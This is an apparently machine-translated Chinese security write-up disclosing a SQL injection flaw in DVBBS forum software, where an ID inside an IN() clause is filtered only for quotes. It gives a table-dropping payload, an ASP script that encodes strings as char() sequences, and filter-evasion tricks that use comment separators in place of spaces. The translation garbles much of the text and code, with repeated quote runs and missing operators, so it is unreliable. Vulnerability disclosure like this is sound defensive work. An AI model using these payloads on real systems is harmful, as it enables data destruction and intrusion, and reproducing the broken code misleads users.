2. Tech
  3. Another type of vulnerability of free version DVBBS

Another type of vulnerability of free version DVBBS

xiaoxiao2021-03-06  104

Another type of vulnerability of free version DVBBS

Author: N.E.V.E.R Source:

Www.safechina.net

Forum login name: n.e.v.e.r

Submit Email Address: n.e.v.e.r@tom.com

Submit QQ number: 1143431

Title: Another type of vulnerability for free version DVBBS

Copyright: Article is China Safety Net

Http://www.safechina.net and the author together, please indicate the source! !

content:

There have been a lot of prawns to turn the card for the free version of the mobile network forum. I found that there may be a class of vulnerabilities to escape the eyes of prawn, so come out. Oh, write a hasty, please correct the wrong, my email is n.e.v.e.r@tom.com. Well, I have a problem with the DVBBS of the commercial registration version, but it is not easy to use.

Take the function Delfriend () in FriendList.asp in the Network Forum, there is such a paragraph in the middle

Delid = Replace (Request.form ("ID"), "'", "")

IF delid = "" or isnull (delid) THEN

Errmsg = errmsg "

  • " "Please select the relevant parameters."

    Founderr = TRUE

    EXIT SUB

    Else

    Conn.execute ("delete from friend where f_username = '" & trim (membername) & "' and f_id in (" & delid & ")")

    SUCMSG = SUCMSG "

    " "

  • You have deleted the selected friend record. "

    Call dvbbs_suc ()

    END IF

    This filtering strict sense is wrong, no 'the same can be made, SQL INJECTION.

    I think about it is the classic 1 'OR' 1 '=' 1 blinded a lot of people's eyes, that is like this

    "SELECT * from user where user = '" & user & "' and .........

    I have no way to indicate different colors with different colors in the 'and And and And and And and And and And and And. In fact, SQL INJECTION is not simple because you can appear in USER, but because 'appears in USER' results in 1 and 2 cannot be paired with the author's meaning. Filtering out the 'can solve this problem very perfect, so Replace (user, "" "," ") is a wonderful and incisive.

    However, the people of the mobile network missed the Dharma, and see what is half a short half of this problem:

    ....... f_id in ("& delid &") "

    It is paired here that the left and right brackets! It is stupid to filter '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' ' We look at a possible attack method

    Delid = .....); Drop Table [user];

    This submission can escape the filtration, but complete SQL injection, successfully delete the table User.

    When I exchange in Nanyang Rock, I just think of this injection method can modify some integer type data. Later, when I turned MSDN-related information, I suddenly found that it could not use 'the effect of using'. One way is to use the char function and a conclusion , I am doing these experiments in the query analyzer:

    Select * from sysusers where left (name, 2) = char (100) char (98)

    The result of this return is all system users starting with DB, that is, this is equivalent to this query.

    Select * from sysusers where left (name, 2) = 'db'

    I posted an encode.asp in the "New Vulnerability and Invasion", which is used, is a way to post it again, to rush the paper, so I have a hurry, if there is an improvement version, please I am

    ======================= cut heren ======================================================================================================================================================

    Fill in the SQL statement!

    " Method = "POST">

    >

    <%

    Link_char = " " string connection symbol is ?

    Strin = Request ("in")

    Strin = strin & "-"

    Strtemp = Split (Strin, "'")

    i = 0

    'On Error Resume Next

    Do While Not Isnull (Strtemp (i))

    IF INSTR (Strtemp (i), "-") Thenexit DO

    END IF

    i = i 2

    Loop

    'Response.Write I

    For J = 0 to i - 1 Step 2

    Strout = strout & strtemp (j)

    For K = 0 to Len (strTemp (J 1)) - 1

    Strout = strout & "char (" & ASC (Right (straTemp (J 1), LEN (Strtemp (J 1)) - K), 1) & ")" & link_char

    NEXT

    Strout = left (strout, len (strout) -len (link_char))

    NEXT

    IF INSTR (STRTEMP (I), "-") <> 0 THEN

    Strout = Strout & Left (Strtemp (i), INSTR (Strtemp (i), "-") - 1)

    END IF

    Response.Write Strout

    %>

    ======================= cut heren ======================================================================================================================================================

    If this place is filtered off or it is ok, but the method should be more complicated. Here is only an example, or the above query statement, this is even no need

    Select * from sysusers where left (name, 2) = stuff (Replicate (25), 2), 2, 1, char (98))

    The effect is the same. More strict, even the space is not available

    SELECT / ** / * / ** / from / ** / sysusers / ** / where / ** / left (name, 2) = stuff (Replicate (char (100), 2), 2, 1, char ( 98))

    However, this method is too much as SQL INJECTION, and the GET method can submit the content of 1024 bytes, which is very likely that it is not enough. Although there are many troubles. When I was tested, I found that these two methods were only valid for simple select / delete / update / insert / exec, and I was wrong when using OpenrowSet. I am still in the test, I hope there is a prawn to give you a less detour.

    Writing here, I think the problem is a problem, I can come up to the pairing issue. SQL INJECTION is, cross-station script attacks are also. Because for cross-station script attacks, it can also be considered that the HTML tag does not have the correct pair, but because HTML is very casual, it is usually necessary to accurately close a SQL query statement as SQL INJECTION. The results of various script attacks are very similar, and the SQL INJECTION results are free to use the SQL query language, and the result of cross-station script attack is free to utilize HTML. If HTML is also considered a language, it is also possible to see that there is a new vulnerability type if it is a language dynamics, and it will have a new vulnerability type. The beginning is SQL INJECTION - this is VBScript to generate SQL query The statement occurs, then the cross-station script attack - this is when VBScript generates HTML. In the future? In the future, I want the script to make new types of problems, and it is estimated that this circle is not left, such as the VBScript generating XML, and so on. Come back to see the network forum, if they don't entangle the problem of filtering, but if there is a pairing as an assessment criteria, there will be these problems.

    • 转载请注明原文地址:https://www.9cbs.com/read-100696.html

    9cbs

    New Post(0)